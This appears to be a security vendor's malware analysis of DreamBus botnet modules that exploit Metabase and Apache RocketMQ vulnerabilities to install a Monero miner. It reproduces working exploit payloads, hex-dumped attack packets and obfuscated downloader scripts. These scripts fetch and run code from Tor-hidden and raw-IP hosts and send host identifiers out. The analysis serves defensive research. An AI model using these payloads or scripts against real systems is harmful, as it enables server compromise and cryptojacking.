Technical Analysis

Zscaler ThreatLabz has previously analyzed DreamBus and its modules. Each DreamBus module is an Executable and Linkable Format (ELF) binary that is packed by UPX with a modified header and footer. This alteration is designed to prevent the UPX command-line tool from statically unpacking DreamBus binaries. The magic bytes UPX! (0x21585055) are typically replaced with values that change over time. In recent DreamBus samples, the UPX magic bytes have been replaced with the value .gnu (0x756e672e). 

DreamBus modules all have a very similar structure. The main difference between each module is the exploit code. Each module scans for servers listening on specific ports, performs exploitation, and if successful, executes shell scripts that download the main DreamBus module, which in turn deploys XMRig to mine Monero cryptocurrency. Each exploit module creates a lock file named /tmp/.systemd.3 to ensure that only one instance is running at a time. Each exploit module scans internal RFC 1918 ranges 172.16.0.0/12, 192.168.0.0/16, and 10.0.0.0/8 as well as randomly scanning public IP ranges.

Over the last 6 months, ThreatLabz observed DreamBus deploy modules for the following applications:

  • Metabase (CVE-2023-38646)
  • RocketMQ (CVE-2023-33246)
  • HashiCorp Consul
  • Hadoop YARN
  • Redis
  • PostgreSQL
  • SSH

The most commonly deployed DreamBus modules target PostgreSQL. Links to the current password lists used by DreamBus to brute force Redis, PostgreSQL, and SSH credentials are provided in the Appendix.

In this blog, we analyze the two exploit modules for Metabase and RocketMQ that were added recently.

Metabase Exploit Module (CVE-2023-38646)

Metabase is a popular business intelligence tool used to analyze and visualize data. The open source versions of Metabase 0.46.6.1 and earlier, as well as Metabase Enterprise 1.46.6.1 and earlier, are vulnerable to CVE-2023-38646, which was first documented in July 2023. The vulnerability allows an attacker to execute arbitrary commands on the server. The DreamBus exploit targeting the vulnerability is likely based on an open source proof-of-concept.

The first step is to scan for Metabase servers listening on port 3000 by sending the following HTTP request:


GET /api/session/properties HTTP/1.1
Host: 127.0.0.1:3000

The DreamBus module checks the response for the string metabase.D to identify whether the server is running Metabase. This string is likely attempting to identify the metabase.DEVICE cookie value. If this string is found, DreamBus stages the exploit by writing the following content to the file /tmp/.json%s (where the format %s string is the IP address of the Metabase server).


{
  "token": "setup-token",
  "details": {
    "is_on_demand": false,
    "is_full_sync": false,
    "is_sample": false,
    "cache_ttl": null,
    "refingerprint": false,
    "auto_run_queries": true,
    "schedules": {},
    "details": {
      "db": 
"zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;",
      "advanced-options": false,
      "ssl": true,
      "init": "CREATE TRIGGER metabasex BEFORE SELECT ON 
INFORMATION_SCHEMA.TABLES AS 
$$//javascriptnjava.lang.Runtime.getRuntime().exec('bash -c 
{echo,dmtIenJnCmV4ZWMgJj4vZGV2L251bGwKTEhqRmd4dG49Li8uJChkYXRlfG1kNXN1
bXxoZWFkIC1jMjApCnVQWEFpRGdwPShkb2gtY2guYmxhaGRucy5jb20gZG9oLWRlLmJsYW
hkbnMuY29tIGRvaC1qcC5ibGFoZG5zLmNvbSBkb2gtc2cuYmxhaGRucy5jb20gZG9oLmxp
IGRvaC5wdWIgZG9oLmRucy5zYiBkbnMudHduaWMudHcpCkFjQ1FZZ0N5PSIvdG1wL3N5c3
RlbWQtcHJpdmF0ZS1kZTIzODFjY2JhOGFh...}|{base64,-d}|bash')n$$"
     },
    "name": "meta-base-sex",
    "engine": "h2"
  }
}

DreamBus then executes the following bash command to send another request to the Metabase server to extract the setup token:


setup_token=$(curl -4fs %s:%d/api/session/properties|grep -Eo 
"([[:alnum:]]{8}-[[:alnum:]]{4}-[[:alnum:]]{4}-[[:alnum:]]{4}-[[:alnum
:]]{12})"|tail -n 1);

After the setup token is extracted, DreamBus uses sed to replace the variable setup-token with the actual value retrieved from the server in the staged exploit file.


sed -i "s/setup-token/$setup_token/g" /tmp/.json%s;

Finally, DreamBus sends the exploit to the server via curl and deletes the staged exploit file in /tmp as follows:


curl -X POST -4fs -H "Content-Type: application/json" -d 
@/tmp/.json%s %s:%d/api/setup/validate  &>/dev/null;rm -f /tmp/.json%s

If the exploit is successful, the following bash script will download and execute the DreamBus main module:


exec &>/dev/null
LHjFgxtn=./.$(date|md5sum|head -c20)
uPXAiDgp=(doh-ch.blahdns.com doh-de.blahdns.com doh-jp.blahdns.com 
doh-sg.blahdns.com doh.li doh.pub doh.dns.sb dns.twnic.tw)
AcCQYgCy="/tmp/systemd-private-de2381ccba8aa44b77bda1c971a33b5e-system
d-logind.service-vkHzrg"
VdHfWQsU="curl -m60 -fsSLkA- --doh-url 
https://${uPXAiDgp[$((RANDOM%${#uPXAiDgp[@]}))]}/dns-query"
JtkrXMaj="curl -m60 -fsSLkA-"
MTWuGlJu="relay.tor2socks.in"
PcSKnocJ="ru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad"
PATH=/tmp:$AcCQYgCy:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin
:/usr/local/sbin:$PATH

jJcSNhfn() {
     read proto server path <<<$(echo ${1//// })
     DOC=/${path// //}
     HOST=${server//:*}
     PORT=${server//*:}
     [[ x"${HOST}" == x"${PORT}" ]] && PORT=80
     exec 3<>/dev/tcp/${HOST}/$PORT
     echo -en "GET ${DOC} HTTP/1.0rnUser-Agent: -rnHost: 
${HOST}rnrn" >&3
     (while read line; do
     [[ "$line" == $'r' ]] && break
     done && cat) <&3
     exec 3>&-
}

wtJymANw() {
     for i in $AcCQYgCy . /usr/bin /var/tmp /tmp ;do echo exit > $i/i 
&& chmod +x $i/i && cd $i && ./i && rm -f i && break;done
}

OUneYJaz() {
     beKjoWyW=/exec
     yXCmWOnw=mb0_$(curl -4 ident.me||curl -4 ip.sb)_$(whoami)_$(uname 
-n)_$(uname -r)_$(cat /etc/machine-id||(ip r||hostname -i||echo 
no-id)|md5sum|awk NF=1)
     $VdHfWQsU -x socks5h://$MTWuGlJu:9050 -e$yXCmWOnw 
$PcSKnocJ.onion$beKjoWyW -o$LHjFgxtn || $VdHfWQsU -e$yXCmWOnw 
$1$beKjoWyW -o$LHjFgxtn || $JtkrXMaj -x socks5h://$MTWuGlJu:9050 
-e$yXCmWOnw $PcSKnocJ.onion$beKjoWyW -o$LHjFgxtn || $JtkrXMaj 
-e$yXCmWOnw $1$beKjoWyW -o$LHjFgxtn
}

ZVdmcgjf() {
     chmod +x $LHjFgxtn;$LHjFgxtn;rm -f $LHjFgxtn
}

RAKjFxFv() {
     u=$PcSKnocJ.tor2web.re/load/
     cd /tmp && curl -V || (jJcSNhfn http://$u/cu) | tar zxp
     wtJymANw
     OUneYJaz $PcSKnocJ.tor2web.re ||
     OUneYJaz $PcSKnocJ.tor2web.in ||
     OUneYJaz $PcSKnocJ.tor2web.it
     ZVdmcgjf
}

ls /proc/$(head -1 /tmp/.systemd.1)/maps || RAKjFxFv
rm -f /home/user/.bash_history

Apache RocketMQ Exploit Module (CVE-2023-33246)

Apache RocketMQ is an open source distributed messaging and streaming platform that was originally created by Alibaba in 2012. In June 2023, a vulnerability cataloged as CVE-2023-33246 was discovered that enables an attacker to achieve remote command execution (RCE) on RocketMQ versions 5.1.0 and earlier. Shortly after, DreamBus added an exploit module to target this vulnerability.

The DreamBus RocketMQ exploit module scans for vulnerable servers on port 10911 by sending the following request to a target server:


00000000   00 00 00 c8 00 00 00 60  7b 22 63 6f 64 65 22 3a  |.......`{"code":|
00000010   32 35 2c 22 66 6c 61 67  22 3a 30 2c 22 6c 61 6e  |25,"flag":0,"lan|
00000020   67 75 61 67 65 22 3a 22  4a 41 56 41 22 2c 22 6f  |guage":"JAVA","o|
00000030   70 61 71 75 65 22 3a 30  2c 22 73 65 72 69 61 6c  |paque":0,"serial|
00000040   69 7a 65 54 79 70 65 43  75 72 72 65 6e 74 52 50  |izeTypeCurrentRP|
00000050   43 22 3a 22 4a 53 4f 4e  22 2c 22 76 65 72 73 69  |C":"JSON","versi|
00000060   6f 6e 22 3a 33 39 35 7d  66 69 6c 74 65 72 53 65  |on":395}filterSe|
00000070   72 76 65 72 4e 75 6d 73  3d 31 0a 72 6f 63 6b 65  |rverNums=1.rocke|
00000080   74 6d 71 48 6f 6d 65 3d  2d 63 20 24 40 7c 73 68  |tmqHome=-c $@|sh|
00000090   20 2e 20 65 63 68 6f 20  63 75 72 6c 20 2d 66 73  | . echo curl -fs|
000000a0   53 6b 4c 41 2d 20 39 32  2e 32 30 34 2e 32 34 33  |SkLA- 92.204.243|
000000b0   2e 31 35 35 3a 38 30 38  30 2f 72 6f 6b 65 74 20  |.155:8080/roket |
000000c0   2d 6f 20 72 65 6b 65 74  65 64 3b 0a              |-o reketed;.|

The first 4 bytes of the packet is the full message size (big endian), followed by 4 bytes for the size of the command (also big endian) within the curly braces. The code value 25 is used to call an update configuration function that is invoked without properly validating whether the client has the necessary permissions. As a result, an unauthenticated attacker can update the broker configuration file and most importantly the rocketmqHome variable to execute arbitrary commands. In this instance, the DreamBus module is setting the rocketmqHome variable in the configuration to the value:


-c $@|sh . echo curl -fsSkLA- 92.204.243.155:8080/roket -o reketed;

If the RocketMQ server is vulnerable, this shell command will use curl to download a malicious bash script and write it to a file named reketed. Example content of this script is shown below:


z3glwn;rm -f reketed
exec &>/dev/null
BDrFYzWg=./.$(date|md5sum|head -c20)
qyynvpBQ=(doh-ch.blahdns.com doh-de.blahdns.com doh-jp.blahdns.com 
doh-sg.blahdns.com doh.li doh.pub doh.dns.sb dns.twnic.tw)
sNHouYjx="/tmp/systemd-private-ae776206422e886961eefb358c4fefda-system
d-logind.service-z3glwn"
GRPoNTxD="curl -m60 -fsSLkA- --doh-url 
https://${qyynvpBQ[$((RANDOM%${#qyynvpBQ[@]}))]}/dns-query"
ZwJtGQaC="curl -m60 -fsSLkA-"
HNPDsmwz="relay.tor2socks.in"
HyMbvhNq="ru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad"
PATH=/tmp:$sNHouYjx:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin
:/usr/local/sbin:$PATH

eGiAsomX() {
     read proto server path <<<$(echo ${1//// })
     DOC=/${path// //}
     HOST=${server//:*}
     PORT=${server//*:}
     [[ x"${HOST}" == x"${PORT}" ]] && PORT=80
     exec 3<>/dev/tcp/${HOST}/$PORT
     echo -en "GET ${DOC} HTTP/1.0rnUser-Agent: -rnHost: 
${HOST}rnrn" >&3
     (while read line; do
     [[ "$line" == $'r' ]] && break
     done && cat) <&3
     exec 3>&-
}

bCQYhArV() {
     for i in $sNHouYjx . /usr/bin /var/tmp /tmp ;do echo exit > $i/i 
&& chmod +x $i/i && cd $i && ./i && rm -f i && break;done
}

XNSBjYOO() {
     HoVCQHFu=/exec
     LouMQEck=rq1_$(curl -s4 ident.me||curl -4 
ip.sb)_$(whoami)_$(uname -n)_$(uname -r)_$(cat /etc/machine-id||(ip 
r||hostname -i||echo no-id)|md5sum|awk NF=1)
     $GRPoNTxD -x socks5h://$HNPDsmwz:9050 -e$LouMQEck 
$HyMbvhNq.onion$HoVCQHFu -o$BDrFYzWg || $GRPoNTxD -e$LouMQEck 
$1$HoVCQHFu -o$BDrFYzWg || $ZwJtGQaC -x socks5h://$HNPDsmwz:9050 
-e$LouMQEck $HyMbvhNq.onion$HoVCQHFu -o$BDrFYzWg || $ZwJtGQaC 
-e$LouMQEck $1$HoVCQHFu -o$BDrFYzWg
}

MPQKanDg() {
     chmod +x $BDrFYzWg;$BDrFYzWg;rm -f $BDrFYzWg
}

dtOFCAtT() {
     u=$HyMbvhNq.tor2web.it/load/
     cd /tmp && curl -V || (eGiAsomX http://$u/cu) | tar zxp
     bCQYhArV
     XNSBjYOO $HyMbvhNq.tor2web.it ||
     XNSBjYOO $HyMbvhNq.tor2web.in ||
     XNSBjYOO $HyMbvhNq.tor2web.re
     MPQKanDg
}

ls /proc/$(head -1 /tmp/.systemd.1)/maps || dtOFCAtT

The DreamBus RocketMQ exploit module checks for the string opaque in the response to determine whether the exploit was successful. If the exploitation attempt was successful, the module then sends the following request to the RocketMQ server to execute the bash script:


00000000   00 00 00 a2 00 00 00 60  7b 22 63 6f 64 65 22 3a  |.......`{"code":|
00000010   32 35 2c 22 66 6c 61 67  22 3a 30 2c 22 6c 61 6e  |25,"flag":0,"lan|
00000020   67 75 61 67 65 22 3a 22  4a 41 56 41 22 2c 22 6f  |guage":"JAVA","o|
00000030   70 61 71 75 65 22 3a 30  2c 22 73 65 72 69 61 6c  |paque":0,"serial|
00000040   69 7a 65 54 79 70 65 43  75 72 72 65 6e 74 52 50  |izeTypeCurrentRP|
00000050   43 22 3a 22 4a 53 4f 4e  22 2c 22 76 65 72 73 69  |C":"JSON","versi|
00000060   6f 6e 22 3a 33 39 35 7d  66 69 6c 74 65 72 53 65  |on":395}filterSe|
00000070   72 76 65 72 4e 75 6d 73  3d 31 0a 72 6f 63 6b 65  |rverNums=1.rocke|
00000080   74 6d 71 48 6f 6d 65 3d  2d 63 20 24 40 7c 73 68  |tmqHome=-c $@|sh|
00000090   20 2e 20 65 63 68 6f 20  62 61 73 68 20 72 65 6b  | . echo bash rek|
000000a0   65 74 65 64 3b 0a                                 |eted;.|

The bash script will then download and execute the main DreamBus module.